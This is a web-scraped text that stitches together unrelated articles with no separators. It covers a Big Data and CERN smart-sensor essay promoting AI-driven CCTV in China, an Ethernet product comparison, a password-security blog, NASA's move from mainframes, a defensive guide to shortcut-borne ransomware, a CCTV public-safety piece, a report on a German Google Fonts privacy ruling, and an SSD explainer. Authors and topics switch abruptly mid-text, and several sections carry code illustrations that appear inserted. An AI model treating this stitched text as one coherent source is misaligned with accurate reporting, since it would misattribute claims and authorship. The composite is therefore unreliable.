God particle of Big Data universe discovered: a smart sensor without ICE
In computer science, part of the future can be predicted through a simple axiom: “what happens at CERN soon happens everywhere.” We could add a second axiom: “what starts centralized ends up decentralized.” How does this apply to Big Data?
BIG DATA IS USUALLY SMALL
Many so-called “Big Data” problems are not that big. The size of 5 years of transactions of a central bank is about 100 GB. One year of central bank transactions can thus fit into a smartphone. The size of all transactions of an insurance company for a single country is less than 4 TB. Insurance data can fit onto a single hard disk.
Many data analysis problems for which companies are investing in expensive infrastructure marketed with a fashionable “Big Data” label could actually be solved with a laptop computer – or even a smartphone – and open source software. Open source packages such as Scikit-Learn, Pandas or NLTK are used by researchers and financial institutions worldwide to process transactional data and customer relation data. Traditional databases such as MariaDB can nowadays handle up to 1 million inserts per second. MariaDB 10.0 even includes replication technologies created by Taobao developers that can obviously scale.
My recommendation before making expensive investments: first purchase a small GNU/Linux server with at least 32 GB of memory and a large SSD (ex. 1 TB), and study the Scikit-Learn Machine Learning 102 tutorial (based on the lectures of Andrew Ng, who recently moved to Baidu). In most cases, this will be enough to solve your problems. If not, you will be able to design a prototype that can later scale on a bigger infrastructure. Scikit-Learn is, by the way, the toolkit used by many engineers at Google to prototype solutions for their “Big Data” problems.
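As a rough illustration of this laptop-scale workflow, the sketch below trains a scikit-learn model on a synthetic dataset that stands in for transactional data. The dataset, sizes and model choice are illustrative assumptions, not a recommendation from the original text:

```python
# Hypothetical laptop-scale prototype: a synthetic stand-in for
# transactional data, classified with an off-the-shelf model.
from sklearn.datasets import make_classification
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split

# 20,000 synthetic "transactions" with 20 features fit easily in RAM
X, y = make_classification(n_samples=20_000, n_features=20, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)

model = RandomForestClassifier(n_estimators=50, n_jobs=-1, random_state=0)
model.fit(X_train, y_train)
accuracy = accuracy_score(y_test, model.predict(X_test))
print(f"held-out accuracy: {accuracy:.3f}")
```

If a prototype works at this scale, the same pipeline can later be pointed at the full dataset on bigger hardware.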
SMALLEST PARTICLES PRODUCE BIGGEST DATA
Extreme challenges posed by research on nuclear physics and small particles have recurrently led to the creation of new information technologies. HTML was invented by Tim Berners-Lee in 1991 at the European Center for Nuclear Research – known as CERN – to solve the problem of large-scale document management. The Large Hadron Collider (LHC) at CERN has been designed to process 1 petabyte of data per second. In 2013 it provided a first proof of the existence of the Higgs boson, a problem that had remained unsolved for nearly 50 years.
Let us understand what 1 petabyte of data per second means. 1 petabyte is the same as 1,000 terabytes, 1,000,000 gigabytes or 13.3 years of HD video. Being able to process 1 petabyte of data per second is thus equivalent to being able to process the data generated by 419,428,800 (13.3 * 365 * 24 * 3600) HD video cameras. This is 15 times more than the number of CCTV cameras in China and 100 times more than in the United Kingdom.
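The camera equivalence quoted above is simple arithmetic and can be checked directly:

```python
# Sanity check of the figures quoted above: if 1 PB holds 13.3 years of HD
# video, then processing 1 PB/s matches the output of this many cameras.
seconds_per_year = 365 * 24 * 3600            # 31,536,000
hd_video_years_per_petabyte = 13.3            # figure quoted in the text

cameras = hd_video_years_per_petabyte * seconds_per_year
print(f"{cameras:,.0f} HD video cameras")     # → 419,428,800 HD video cameras
```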
Overall, technologies created at CERN for small particles could be applied to collect and process in real time all data produced by every human being on the planet in the form of sound, video, health monitoring, smart fabric logs, etc.
INTRODUCING SMART SENSORS
The key concept that explains the success of CERN’s Big Data architecture is its ability to throw away most of the collected data as soon as possible and eventually store only a tiny fraction of it. This is achieved by moving most of the data processing to smart sensors that are capable of so-called “artificial intelligence” – in reality advanced statistics, also known as machine learning.
One of the sensors at the LHC – called the Compact Muon Solenoid (CMS) – collects 3 terabytes of picture data per second representing small particles colliding. It then throws away pictures that are considered irrelevant and sends “only” 100 megabytes per second to the LHC storage infrastructure, that is, 30,000 times less than what it initially collected. The sensor itself uses an FPGA – a kind of programmable hardware that can process data faster than most processors – to implement a machine learning algorithm called “clustering”.
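The real CMS trigger is an FPGA pipeline far beyond a few lines of Python, but the underlying idea of discarding almost everything at the sensor can be sketched with a toy threshold filter. The data and threshold below are invented for illustration and are not the real clustering algorithm:

```python
# Toy "smart sensor": keep only rare excursions from a noisy signal and
# discard the rest, mimicking the massive data reduction described above.
import random

random.seed(42)
readings = [random.gauss(0, 1) for _ in range(100_000)]  # raw samples

THRESHOLD = 4.0  # only rare, "interesting" events exceed this
kept = [r for r in readings if abs(r) > THRESHOLD]

reduction = len(readings) / max(len(kept), 1)
print(f"kept {len(kept)} of {len(readings):,} samples "
      f"(about {reduction:,.0f}x reduction)")
```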
If we wanted to apply the ideas of the LHC to CCTV surveillance, we would possibly store a couple of hours of video in each camera and use an FPGA or a GPU to process video data in real time, directly inside the camera. We would use re-programmable artificial intelligence to detect the number of people, their gender, their size, their behavior (peaceful, violent, thief, lost, working, etc.), the presence of objects (ex. a suitcase) or the absence of an object (ex. a public light). Only this metadata would be sent over the network to a central processing facility, which could decide, if necessary, to download relevant pictures or portions of video. And in case a CCTV area gets disconnected by criminals, a consumer drone could be sent to check out what is happening.
Overall, the LHC teaches us how to quickly build an efficient video surveillance system with a smaller investment or a wider reach. This system can be deployed on existing narrowband telecommunication networks – including GSM – anywhere in the world. It is also probably more resilient than systems that store and process everything in a central place. And it can still work offline or in case of a network outage.
SMART PRIVACY, SMART MARKETS
“With the tapping program code-named PRISM, the U.S. government has infringed on the privacy rights of people both at home and abroad,” explains the report on the U.S. human rights situation published by the Chinese government on 28 February 2014. Similar programs have been implemented in countries with strict privacy laws. With a 65% market share dedicated to surveillance and strong economic forces behind it, Big Data is one of the technologies that can infringe the most on privacy rights if it is not regulated.
Candidate Markets for Big Data
Smart sensors provide a possible solution, as long as their code can be audited by an independent authority in charge of privacy. By dropping, encrypting, and anonymising most data, privacy law can be enforced at the origin, inside the sensor. The risk of abuse of the surveillance system is reduced by the absence of raw data transmission and by the absence of central storage. Sensor access logs can be published as open data to ensure complete auditability.
Upgrading CCTV to smart cameras in China alone represents a yearly market of up to 200 billion RMB. A national upgrade program could be an occasion to build core features of a “smart city” directly inside smart cameras: public Internet access, Web acceleration, Cloudlet, mobile storage offload, geographic positioning, multi-access mesh networking, barrier-free tolling systems, etc. Those are only a few of the many applications that could be developed and later exported worldwide, since China is the largest producer of CCTV systems and already a partner of foreign defense industries.
INTERNET OF THINGS MEANS EVEN BIGGER DATA
By 2020, surveillance will no longer be the primary market of Big Data. According to Gartner, 26 billion objects will then be connected to the Internet, more than 100 times the number of CCTV cameras worldwide. Connected objects include industrial sensors in factories, cars, consumer electronics, wind turbines, traffic lights, etc.
Preventive maintenance through failure prediction – a direct application of machine learning and Big Data – will then be embedded into objects, along with other smart features. GPUs in low-cost systems on chips (SoCs) will be used to implement fast machine learning at low cost.
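As a hedged sketch of what embedded failure prediction might look like, the example below fits a classifier to invented sensor readings. The features, thresholds and failure rule are assumptions made up for the illustration; a real deployment would train on logged machine telemetry:

```python
# Illustrative preventive-maintenance model: predict failure risk from
# two invented sensor features (temperature and vibration).
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(0)
temp = rng.normal(60, 10, 5_000)         # degrees C
vibration = rng.normal(2.0, 0.5, 5_000)  # mm/s RMS
X = np.column_stack([temp, vibration])

# Invented ground truth: hot AND strongly vibrating machines tend to fail
y = ((temp > 70) & (vibration > 2.3)).astype(int)

model = LogisticRegression(max_iter=1000).fit(X, y)
risky = model.predict_proba([[85.0, 3.2]])[0, 1]    # unhealthy reading
healthy = model.predict_proba([[55.0, 1.8]])[0, 1]  # healthy reading
print(f"failure risk: unhealthy={risky:.2f}, healthy={healthy:.2f}")
```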
Chinese industry already has an edge for applications that combine the Internet of Things with Big Data. The recent alliance of ARM, Spreadtrum, Allwinner, Rockchip, Huawei and others highlights the growing importance of ARM-based solutions designed in China. It is now possible to imagine that in a few years, a System on Chip with GPU, networking and a Linux operating system will cost less than 1 USD. At this price, it would become the standard component for implementing machine learning algorithms in connected smart devices. On the higher end, a Big Data cluster could be designed with multi-core ARM System on Chips (SoCs) and solid state disks (SSDs). And for the first time, all components could be sourced in China at lower cost than Intel for equivalent performance.
Mobile Computing Association (MCA) Established in Shenzhen in April 2014 (Credit. Bob Peng, ARM)
What is probably missing now is software to process data with efficient distributed algorithms. Considering the recent “No ICE” policy (a.k.a. “No IOE”) that has been discussed in China and Hadoop’s strong dependency on Java, a product now controlled by Oracle, it could be a good time to consider other software solutions for Big Data. Recently, many communities seem to be unifying their data processing efforts around Python’s NumPy open source technology [20,21], while others create new languages such as Julia. One of the biggest challenges to solve is “out-of-core” data processing, that is, processing data beyond the limits of available memory. Projects such as Wendelin and Blaze are already on track to provide open source solutions.
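To make “out-of-core” concrete, here is a minimal sketch that computes a statistic over an on-disk array in fixed-size chunks using NumPy’s memmap. The file name and sizes are illustrative assumptions:

```python
# Out-of-core sketch: stream an on-disk array through memory in chunks
# instead of loading it all at once.
import os
import tempfile

import numpy as np

path = os.path.join(tempfile.gettempdir(), "big_array.dat")
n = 10_000_000  # pretend this is too large for RAM

# Create the on-disk array once (a stand-in for real sensor logs)
arr = np.memmap(path, dtype=np.float32, mode="w+", shape=(n,))
arr[:] = 1.0
arr.flush()

# Process it chunk by chunk
data = np.memmap(path, dtype=np.float32, mode="r", shape=(n,))
chunk = 1_000_000
total = sum(float(data[i:i + chunk].sum()) for i in range(0, n, chunk))
print(f"mean = {total / n}")  # → mean = 1.0
```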
Overall, our guess is that “No ICE” solutions will be created in one of the Big Data projects being launched in China – in Guizhou or in Xinjiang for example – backed by budgets of tens of billions of RMB that open the doors to truly innovative technologies able to cope with exabytes if not zettabytes of data produced by smart sensors.
I would like to thank Thomas Serval of Kolibree, Maurice Ronai of Items, Hervé Rannou of Cityzen Data, Mathias Herberts of Cityzen Data and Alexandre Gramfort of Scikit-Learn for the ideas they shared on Big Data.
Scikit-Learn – http://scikit-learn.org/
Pandas – http://pandas.pydata.org/
NLTK – http://www.nltk.org/
ScaleDB – http://www.scaledb.com/
MariaDB 10.0 announcement and multimaster replication
LHC – http://en.wikipedia.org/wiki/Higgs_boson#Discovery_of_candidate_boson_at_CERN
Big Brother in China is watching, with 30 million surveillance cameras – http://news.msn.com/world/big-brother-in-china-is-watching-with-30-million-surveillance-cameras-1
Revealed: Big Brother Britain has more CCTV cameras than China – http://www.dailymail.co.uk/news/article-1205607/Shock-figures-reveal-Britain-CCTV-camera-14-people–China.html
The Large Hadron Collider Throws Away More Data Than It Stores – http://gizmodo.com/5914548/the-large-hadron-collider-throws-away-more-data-than-it-stores
Compact Muon Solenoid – http://en.wikipedia.org/wiki/Compact_Muon_Solenoid
FPGA Design Analysis of the Clustering Algorithm for the CERN Large Hadron Collider – http://homepages.cae.wisc.edu/~aminf/FCCM09%20-%20FPGA%20Design%20Analysis%20of%20the%20Clustering%20Algorithm%20for%20the%20CERN%20Large%20Hadron%20Collider.pdf
Parrot Bebop Drone : caméra HD et compatibilité avec l’Oculus Rift – http://www.lesnumeriques.com/robot/parrot-bebop-drone-p20562/parrot-bebop-drone-camera-hd-compatibilite-avec-oculus-rift-n34313.html
Commentary: U.S. should “sweep its own doorstep” on human rights – http://news.xinhuanet.com/english/indepth/2014-02/28/c_133150005.htm
Big Data, Bigger Digital Shadows, and Biggest Growth in the Far East – http://idcdocserv.com/1414
Huawei, Thales, Orange set up video surveillance in Abidjan – http://www.telecompaper.com/news/huawei-thales-orange-set-up-video-surveillance-in-abidjan–975487
Gartner predicts the presence of 26 billion devices in the ‘Internet of Things’ by 2020 – https://storageservers.wordpress.com/2014/03/19/gartner-predicts-the-presence-of-26-billion-devices-in-the-internet-of-things-by-2020/
Python on the GPU with Parakeet – http://vimeo.com/79556629
Mobile Computing Association MCA Established in Shenzhen – http://www.marce.com.cn/china-tablets-industry/arm-counterattack-on-intel-mobile-computing-association-mca-established-in-shenzhen.html
The homogenization of scientific computing, or why Python is steadily eating other languages’ lunch – http://www.talyarkoni.org/blog/2013/11/18/the-homogenization-of-scientific-computing-or-why-python-is-steadily-eating-other-languages-lunch/
China’s No ‘ICE’ Policy – http://www.datacenterdynamics.com/blogs/china%E2%80%99s-no-ice%E2%80%99-policy-0
Anaconda – https://store.continuum.io/cshop/anaconda/
Julia – http://julialang.org/
Wendelin Exanalytics – http://www.wendelin.io/
Blaze – http://blaze.pydata.org/
Guizhou aims to become big data hub – http://guizhou.chinadaily.com.cn/2014-03/03/content_17317216.htm
Big data center to be built in Xinjiang – http://www.chinadaily.com.cn/china/2013-12/04/content_17152426.htm
Révélations sur le Big Brother français – http://www.lemonde.fr/societe/article/2013/07/04/revelations-sur-le-big-brother-francais_3441973_3224.html
Kolibree – http://www.kolibree.com
Items International – http://www.cityzendata.com/
Machine Learning 102:Practical Advice – http://www.astroml.org/sklearn_tutorial/practical.html
Machine learning godfather Andrew Ng joined the Baidu force deep learning – https://www.ctocio.com/ccnews/15615.html
Cityzen Data – http://www.cityzendata.com
Today, our lives can hardly do without Internet communication. We shop, write letters and do business relying on Ethernet connections both at home and at the office. Gigabit Ethernet switches and splitters are networking devices primarily used for connecting computers or other networking devices. However, they are quite different. This article focuses on Ethernet switch vs splitter.
Ethernet Switch vs Splitter: What Are They?
First, let’s figure out the definitions of the two terms.
An Ethernet switch is a high-speed networking device that provides ports for connecting computers, printers, cameras and other devices in a building or campus. Through these ports, the switch receives incoming data packets and redirects them to their intended destinations within a LAN. An Ethernet switch usually works at the data link layer (also called layer 2), though some models can also operate at the network layer (layer 3) or above.
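The learn-and-forward behavior described above can be modeled in a few lines. This toy sketch is not how real switch silicon works; it only illustrates the logic of MAC learning, direct forwarding and flooding:

```python
# Toy layer-2 switch: learn which port each source MAC arrives on, forward
# to the learned port when the destination is known, flood otherwise.
class ToySwitch:
    def __init__(self, num_ports):
        self.ports = range(num_ports)
        self.mac_table = {}  # MAC address -> port number

    def receive(self, in_port, src_mac, dst_mac):
        self.mac_table[src_mac] = in_port  # learn the sender's location
        if dst_mac in self.mac_table:
            return [self.mac_table[dst_mac]]            # forward directly
        return [p for p in self.ports if p != in_port]  # flood

sw = ToySwitch(num_ports=4)
print(sw.receive(0, "aa:aa", "bb:bb"))  # unknown destination: flood [1, 2, 3]
print(sw.receive(1, "bb:bb", "aa:aa"))  # "aa:aa" was learned on port 0: [0]
print(sw.receive(0, "aa:aa", "bb:bb"))  # "bb:bb" now known on port 1: [1]
```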
A network splitter acts as a power distribution device, like a splitter in a coaxial cable transmission system. It is a passive device, which means it doesn’t need external power. As the name implies, it can split a single Internet connection to create extra connections, so that additional computers on a network can be connected.
Ethernet Switch vs Splitter: What Are the Differences?
An Ethernet switch can be used for networks that include different devices, for example a computer, a video game console and a printer. A switch needs a power input so that it can divide an Ethernet signal into various signals that can operate at the same time. As a result, different devices can be connected to the switch and work simultaneously.
As for the Ethernet splitter, there is no need for a power input, but splitters need to be used in pairs. A splitter physically splits a single Ethernet connection into two connections. Simply put, if you want to connect two computers in one room to a switch in another room, you need splitters. Instead of running two Ethernet cables from one room to the other, a pair of splitters lets one cable carry both connections between the computers and the switch. This is the basic principle of how to use an Ethernet splitter.
Ethernet Switch vs Splitter: Where to buy?
The following products of Ethernet splitter vs switch are from FS.COM.
This is an Ethernet switch with 48×1GbE SFP ports and 4×10GbE SFP+ uplink ports. With a switching capacity of 176Gbps, it supports comprehensive L2 and L3 network management features, offering MLAG, MPLS, IPv4/IPv6, SNMP, etc. Designed with a maximum power draw of 75W, this switch is ideal for traditional or fully virtualized data centers.
Figure 1: S5800-48F4S Switch
As for Ethernet switch vs splitter, we have now seen how Ethernet splitters and switches work. Both of them can optimize our network and allow us to work in an efficient and highly secure way. Welcome to visit FS.COM to pick your own Ethernet switch and splitter.
Internet users are often blamed for weak password security, but who’s really responsible: the users for setting weak passwords, or the websites for allowing them?
You don’t need to be a world-class hacker to know that “1,2,3,4,5” isn’t quite the most effective password available. Often, internet users generating weak passwords for the sake of convenience is the main reason they become vulnerable to security threats. However, studies show that, in reality, websites are not doing much to ensure the security of our online accounts. The solution would seem rather obvious then, right? Generate a stronger password. Before you close this case, you must understand that websites will not implement this policy any time soon. The reason is simple: website developers are faced with choosing between security and usability. Companies will often choose the latter, as mass appeal will trump mass protection.
Even though certain website sign-ups seem tedious when they ask for certain password qualifications, the reality is that these are the sites that are going to ensure your privacy. According to Security Editor Dan Goodin, the reason that so many users continue to use weak passwords is that websites are not enforcing policies that require stronger ones.
Even major corporations such as Google and Facebook are allowing users to create weak passwords to maintain easy account setup. It is up to websites to enforce stronger password security policies. Currently, certain companies are creating general password blacklists that ensure certain passwords cannot be used. Until every website implements such rules, it is highly recommended to create a password with lowercase, uppercase, special and numeric characters.
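A password policy of this kind can be expressed in a few lines. The sketch below is illustrative; the blacklist is a tiny stand-in for the much larger lists real services maintain:

```python
# Illustrative password check: reject blacklisted or short passwords and
# require lowercase, uppercase, numeric and special characters.
import string

BLACKLIST = {"12345", "password", "qwerty", "letmein"}

def is_strong(password):
    if password.lower() in BLACKLIST or len(password) < 8:
        return False
    classes = [string.ascii_lowercase, string.ascii_uppercase,
               string.digits, string.punctuation]
    return all(any(c in cls for c in password) for cls in classes)

print(is_strong("12345"))        # → False (blacklisted)
print(is_strong("Tr0ub4dor&3"))  # → True (long, all four classes)
```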
No one can force you to take the necessary measures to secure your information. While users are creating weak passwords, internet security is a two-way street. At Affant, your security is always our first priority. With 24/7 monitoring and security, we guarantee that if your password is ever breached, Affant is on your side.
Affant Director of Engineering since 2000. Management of engineering and support team, escalation of all technical and client issues. Sales and design engineer.
The powerful, refrigerator-sized computers that were once a hallmark of corporate and research data centers have steadily lost ground to off-the-shelf servers over the years.
Mind you, mainframes are still alive and kicking, but they’ve been relegated to workloads that require secure and dedicated data processing. Think moneyed financial firms, energy producers and other organizations and government agencies where secrecy and security are top priorities — even if that comes at the cost of some flexibility.
“The end-user interfaces are clunky and somewhat inflexible, but the need remains for extremely reliable, secure transaction oriented business applications,” writes Cureton.
In retrospect, it’s kind of hard to imagine NASA without its mainframes. In popular culture, visuals of chunky, blinking caverns of computer equipment — complete with reel-to-reel tape — are as synonymous as the agency’s scientists and space-faring exploits.
Exploring and pioneering clouds
Today, the reality is different. In recent years, the federal government as a whole is looking to efficient, cost-cutting ways of getting the computing power it needs. The solution, in large part, is cloud computing.
NASA’s own Nebula cloud computing platform is an effort to give engineers and researchers a bigger pool of computing power and grant its partners and the public access to its data sets. But the space agency is more than an adopter, it’s also a pioneer.
NASA and Rackspace are behind the open source cloud platform called OpenStack. Of late, the technology has attracted an impressive number of supporters including mega-carrier AT&T. And startups like Cloudscaling and Piston Cloud Computing — the latter of which was co-founded by NASA Nebula Chief Technical Architect Joshua McKenty — are bringing OpenStack-based private clouds to enterprises.
So, as NASA bids farewell to the mainframe, it’s doing more than its part to advance the cloud. Fitting, isn’t it?
Image credit: NASA
Ransomware developers are always on the lookout for new ways to make money out of infecting people: phishing schemes, malicious ads, infected email spam. As if these weren’t enough, now there’s a new way to spread ransomware: through PC shortcuts.
How Does the LNK infection Happen?
The shortcut method of distributing malware relies on putting the malicious payload into LNK files, better known as shortcuts. The most common way of spreading ransomware is to attach a ZIP file to an e-mail. Ransomware distributed through shortcuts works pretty much the same way, except the attached file is a shortcut disguised as something the user would want to open.
How Can You Distinguish Malware Shortcuts
First of all, shortcuts have a small arrow inside their icon, while other files do not. Here is a picture demonstrating the difference below. The shortcut is on the right:
You can also check if a file is a shortcut by:
- Right clicking on it
- Selecting Properties
- Going to General
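Beyond the icon and the Properties dialog, a script can check what a file actually is by reading its header: Windows shortcuts begin with a fixed Shell Link signature. The file names below are invented for the example:

```python
# Detect a Windows shortcut (.lnk) by its header bytes rather than its
# name or icon: LNK files begin with HeaderSize 76 and a fixed LinkCLSID.
import os
import tempfile

LNK_MAGIC = (b"\x4c\x00\x00\x00"                   # HeaderSize = 76
             b"\x01\x14\x02\x00\x00\x00\x00\x00"
             b"\xc0\x00\x00\x00\x00\x00\x00\x46")  # LinkCLSID

def looks_like_shortcut(path):
    with open(path, "rb") as f:
        return f.read(len(LNK_MAGIC)) == LNK_MAGIC

# Example: a fake "invoice.pdf" that is really a shortcut under the hood
fake = os.path.join(tempfile.gettempdir(), "invoice.pdf")
with open(fake, "wb") as f:
    f.write(LNK_MAGIC + b"...rest of the shortcut data...")

print(looks_like_shortcut(fake))  # → True
```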
Protection Against Shortcut Ransomware
A good rule of thumb when it comes to files received through email is to avoid suspicious attachments that look off. You can watch for these telltale signs:
- Avoid suspicious email attachments. Don’t download ZIP or LNK file attachments with titles like “Your Computer Is At Risk” or messages claiming to be from a bank or an e-commerce store. Official services almost never send ZIP files or shortcuts
- Don’t download shortcut files. If an LNK file is sent to you via email, its best not to download it. Look for the small arrow that indicates a shortcut, as seen above
There are also other ways of protecting yourself against ransomware. You can apply filters to your email address, blocking emails containing EXE, ZIP or LNK files. Also, download an anti-virus program if you haven’t already.
What Can You Do If You Get Infected by Ransomware
If your PC falls to a ransomware virus, you should do one of the following things:
- Don’t pay the ransom, as there’s no guarantee your system will be restored.
- Try to get rid of it by using this guide for manually removing malware from your computer
- Download an anti-malware tool and scan your system with it. That can also prove very useful for prevention of malicious content in the future, including ransomware.
If you get infected by a ransomware attack, be sure to check our section dedicated to combating this type of virus.
Major cities are the homes of millions of people. Therefore, public safety is essential to ensure a secure environment. Although you can’t watch citizens’ every move, you can keep an eye on highly populated areas such as public spaces and highways. Read about the uses of closed-circuit cameras in major cities for more information.
Did you know people are less likely to commit a crime if a camera is monitoring them? Many establishments use closed-circuit cameras to keep track of customer actions and monitor building activity. You may notice surveillance cameras in banks, retail stores, and restaurants. The cameras aid in preventing theft and vandalism. In major cities, crime rates are an increasingly prevalent problem. However, closed-circuit cameras do prevent crime to a certain extent. Since these cameras record people’s actions, people tend to stray away from petty crimes.
Many major cities have a traffic monitoring system that uses closed-circuit cameras to detect accidents and congestion. The system alerts a database and first responders in the event of an emergency. At other times, closed-circuit cameras can identify speeding and people running red lights. Many drivers tend to speed in tunnels because they think cameras aren’t watching. However, this isn’t the case. Most underground tunnels rely on industrial networking that tracks traffic flow at a tunnel’s entrance, interior, and exit.
Public Space Monitoring
The next time you’re in a public space, you may notice surveillance cameras. Public spaces include sports arenas, clubs, vacation areas, businesses, and tourist sites. Ultimately, anywhere that has a continuous flow of people is considered a public space. Therefore, it’s essential to monitor the area. People can find closed-circuit cameras on top of buildings, in corners, or planted in specific areas. These cameras ensure public safety by keeping a watchful eye on the area. In addition, video footage from the cameras can serve as evidence in criminal cases in the event of a crime.
Closed-circuit cameras ensure public safety by keeping recorded footage of citizen activities in public spaces. These cameras also help prevent crimes and monitor traffic. If you’re wondering about surveillance in cities, always look back at the uses of closed-circuit cameras in major cities for information.
Typefaces can be a tricky business, both technically and legally.
Before word processors, laser printers and digital publishing, printed materials were quite literally “set in metal” (or wood), with typesetters laying out lines and pages by hand, using mirror-image letters cast on metal stalks (or carved into wooden blocks) that could be arranged to create a back-to-front image of the final page.
The laid-out page was effectively a giant stamp; when inked up and pressed against a paper sheet, a right-way-round image of the printing surface would be transferred to the page.
For books printed in Roman script, typesetters kept multiple copies of each letter in separate pigeonholes in a handy tray, or printer’s case, making them easy to find at speed. The capital letters were kept in their own case, which was placed by convention above the case containing the small letters, presumably so that the more commonly-used small letters were closer to hand. Thus capital letters came from the upper case, and small letters from the lower case, with the result that the terms upper case and lower case became metaphorical phrases used to refer to the letters themselves – names that have outlived both printers’ cases and movable type.
Getting the right look
Designing a typeface (or “font”, as we somewhat inexactly refer to it today) that is both visually appealing and easy to read, and that retains a unique and attractive look across a range of different sizes, weights and styles, is an astonishingly complex task.
Indeed, although the digital age has made it easy to create new fonts from scratch, and cheap to ship them as computer files (another physical document metaphor that has survived into the computer era), designing a good typeface is harder than ever.
Users expect the font to look good not only when scaled up or down to any size, including fractions of a millimetre, but also when displayed or printed as a collection of separate pixels at a variety of resolutions using a range of different technologies.
As a result, good typefaces can be expensive, especially if you want to adopt a font collection as a company standard for your corporate identity, and you want to license it correctly for all possible uses, including on the web, in print, for editorial, in advertising, on posters, in films and videos, for redistribution embedded in presentations and documents, and more.
“Free” font collections abound online, but – as with videos, music, games and other artistic content – many of these downloads may leave you with dubiously licensed or even outright pirated fonts installed on your computer or used in your work.
Nevertheless, many distinguished font creators provide open source fonts available for personal and commercial use, and numerous free-and-properly-licensed font collections do exist, including the well-known Google Fonts.
In fact, the Google Fonts site not only allows you to download font files to use in your own documents or to copy onto your own web servers to embed into your web pages…
…but also allows you to link back to a Google Font server so you don’t even need to host the file yourself.
For boutique websites, that’s convenient because it means you get font updates automatically, and you don’t have to pay any bandwidth fees to your hosting provider for sending the font file to every visitor.
Local or cloudy?
On the Naked Security website, for example, our body text [2022-01-31] is set in a typeface called Flama, which isn’t open source.
So, we host the font file ourselves and serve it up as part of the web page, from the same domain as the rest of the site, using an
@font-face style setting, in the fashion you see here:
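A typical rule of this kind looks like the sketch below; the file path, weight and exact descriptors are assumptions for illustration rather than the site’s actual stylesheet:

```css
/* Hypothetical @font-face rule; the real path and descriptors may differ. */
@font-face {
  font-family: "Flama";
  src: url("/fonts/flama-regular.woff") format("woff");
  font-weight: normal;
  font-style: normal;
}

body {
  font-family: "Flama", sans-serif;
}
```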
This means that even though you are unlikely to have Flama installed yourself, our website should render with it in your browser just as it does in ours, using the WOFF (Web Open Font Format) version of the font file.
The Flama WOFF font you see below is modestly sized at just 26 KBytes, but it is our responsibility to serve it up as needed:
Licensing and serving in one place
So, Google Fonts not only “solves” your licensing issues by offering open source fonts that you are allowed to use commercially, it can also solve your “how to serve it” hassles, too.
You simply link to a Google-hosted web stylesheet (CSS) page that sets up the necessary
@font-face specifications for you, and fetches the desired font files from the Google Fonts service, like this:
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=fontyouwant">
Of course, that means that Google’s servers get a visit from your browser, and thus Google unavoidably gets your IP number (or an IP number provided by your ISP or VPN provider, which loosely amounts to the same thing).
If you have some sort of tracking protection turned on, your browser might not fetch the requested CSS and font data, in which case you’ll see the text in the closest matching font your browser has available.
But if you haven’t set your browser to block these downloads, you’ll get the font and Google will get your IP number.
Is that private enough?
Apparently, not always.
A District Court in Munich, Germany, recently heard a legal complaint in which the plaintiff argued that a website that had linked across to Google Fonts, instead of downloading and hosting a copy of the free font on its own site, had violated their privacy.
The court agreed, demanded that the website operator start hosting fonts locally, and awarded the complainant damages of €100 (about $110).
The court’s argument doesn’t seem to suggest that any and all other third-party “widget linking” is now considered illegal in Germany (or, more particularly, in the region where this court holds sway), but only that websites are expected to host content locally if that’s easily possible:
Google Fonts kann durch die Beklagte auch genutzt werden, ohne dass beim Aufruf der Webseite eine Verbindung zu einem Google-Server hergestellt wird und eine Übertragung der IP-Adresse der Webseitennutzer an Google stattfindet.
(The defendant [i.e. the website operator] can make use of Google Fonts without establishing a connection to a Google server, and without the IP address of the website user being transmitted to Google.)
If you’ve ever had rogue adverts – what’s known as malvertising – thrust into your browser when you’ve visited an otherwise unexceptionable and trustworthy website, you might be thinking, “This is a great decision, because if everyone who monetised ads served them up from their own domains, it would be much easier to keep track of who was responsible for what, and ad filtering would become a whole lot simpler.”
There’s also the problem that this judgement has penalised a website provider for linking to a Google service that has (or at least claims to have) a pretty liberal privacy and tracking policy:
The Google Fonts API is designed to limit the collection, storage, and use of end-user data to only what is needed to serve fonts efficiently.
Use of Google Fonts API is unauthenticated. No cookies are sent by website visitors to the Google Fonts API. Requests to the Google Fonts API are made to resource-specific domains, such as fonts.googleapis.com or fonts.gstatic.com. This means your font requests are separate from and don’t contain any credentials you send to google.com while using other Google services that are authenticated, such as Gmail.
Yet the judgement is of necessity mute about embedded links that track users as part of their service, such as web analytics tools, because those services are almost always cloud-based by design, and therefore cannot be hosted locally.
Are those to be made illegal in Bavaria, too? Or will the cloud-centric nature of web analytics effectively exempt analytics services from this sort of judgement simply because the expectation is that they’re rarely, if ever, hosted locally?
And what about so-called “live content” from other sites?
Twitter, for example, requires that if you want to show a complete tweet in your web page, you need to embed it directly, rather than locally hosting a screenshot and providing a link that a user can optionally click later on.
From a traffic point of view, that makes sense for Twitter, because “live” links not only display current tweet statistics, but also make it really easy for readers to engage frictionlessly with the tweet.
But it also makes sense from a legal and cybersecurity point of view, because Twitter itself can adapt data that’s embedded via links to its site (such as deleting offensive, illegal or misleading content as desired or required), instead of relying on every website that ever took a screenshot of a tweet to go back and update or remove the content if common sense or a court order demands it.
Have your say
Where do you stand on this?
Do you think this is an overreach by the court?
Do rulings like this suggest we’re heading towards the end of the era of third-party adverts (after all, adverts don’t have to be served via the cloud; they all could be served locally, even if most services don’t yet support that way of working, and even if it’s a lot less convenient)?
Let us know below… you may remain anonymous if you like.
A drive is a drive, right? Not at all. Allow us to explain the differences between SSD technology and HDD technology.
Hard disk drives (HDDs) are primarily found in computers and laptops. Solid state drives (SSDs) are becoming more common in computers and laptops, and are also found in tablets, cell phones, portable drives and mp3 players.
Consider the familiar USB memory stick. A solid state drive is a larger, more sophisticated version of your traditional thumb drive. Like a memory stick, the SSD stores information on microchips and contains no moving parts. Meanwhile, a hard disk drive records information on a storage platter by moving a mechanical arm with a read/write head over a spinning platter.
The platter inside the hard disk drive is coated with a magnetic medium that records data in binary code (1s and 0s). A solid state drive contains no magnetic coatings. Instead, SSDs rely on an embedded processor, or "brain", and interconnected flash memory chips that retain data even when no power is present.
